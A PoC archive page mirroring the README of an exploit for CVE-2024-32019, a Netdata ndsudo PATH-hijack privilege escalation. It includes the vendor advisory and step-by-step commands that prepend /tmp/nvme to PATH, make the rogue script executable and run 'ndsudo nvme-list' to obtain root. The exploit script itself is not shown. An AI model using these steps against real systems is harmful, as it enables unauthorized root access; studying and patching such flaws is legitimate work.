Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2024-32019 PoC — ndsudo: local privilege escalation via untrusted search path

Source
https://github.com/hexared/CVE-2024-32019_poc
Associated Vulnerability
Title:ndsudo: local privilege escalation via untrusted search path (CVE-2024-32019)
Description:Netdata is an open source observability tool. In affected versions the `ndsudo` tool shipped with affected versions of the Netdata Agent allows an attacker to run arbitrary programs with root permissions. The `ndsudo` tool is packaged as a `root`-owned executable with the SUID bit set. It only runs a restricted set of external commands, but its search paths are supplied by the `PATH` environment variable. This allows an attacker to control where `ndsudo` looks for these commands, which may be a path the attacker has write access to. This may lead to local privilege escalation. This vulnerability has been addressed in versions 1.45.3 and 1.45.2-169. Users are advised to upgrade. There are no known workarounds for this vulnerability.
Description
This is an alternative poc for the CVE-2024-32019 written in python
Readme
# Privilege Escalation via `ndsudo` (Netdata Local Exploit)

This is an alternative POC to exploit a vulnerable `ndsudo` utility bundled with Netdata to perform a local privilege escalation.
The exploit works by adding the script inside the user’s `PATH` substituting an allowed command (`nvme`) by `ndsudo` and execute it as root.

---

## Prerequisites & Assumptions :scroll:

- **Local shell access** on the target system.
- Python3 on the target machine
- Possibilty to execute the `ndsudo` command.

---

## Steps

### 1. Script :hammer:

You can either create or upload the script directly to the target machine as long as it's called as one of the allowed commands.
To check the allowed commands by `ndsudo` just launch `ndsudo --help`.

For this poc we'll use the command `nvme-list`, so the script will be called `nvme`.

---
### 2. PATH injection :syringe:

Once the script has been created and named after an allowed command by `ndsudo` we need to inject it at the beginning of the `PATH` variable so it will be the first one to be found and executed

```bash
export PATH="/tmp/nvme:$PATH"
```
---
### 3. Execution permissions :gun:

Obviusly the script needs to have execution permissions
```bash
chmod +x /tmp/nvme
```
---
### 4. Trigger the Exploit :boom:

Once everything is set up, just launch `ndsudo` with the rogue script and you're root.

```bash
ndsudo nvme-list
```
---

## Resources :books:

- Netdata Github Advisory: https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93


Hack responsibly :skull:
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →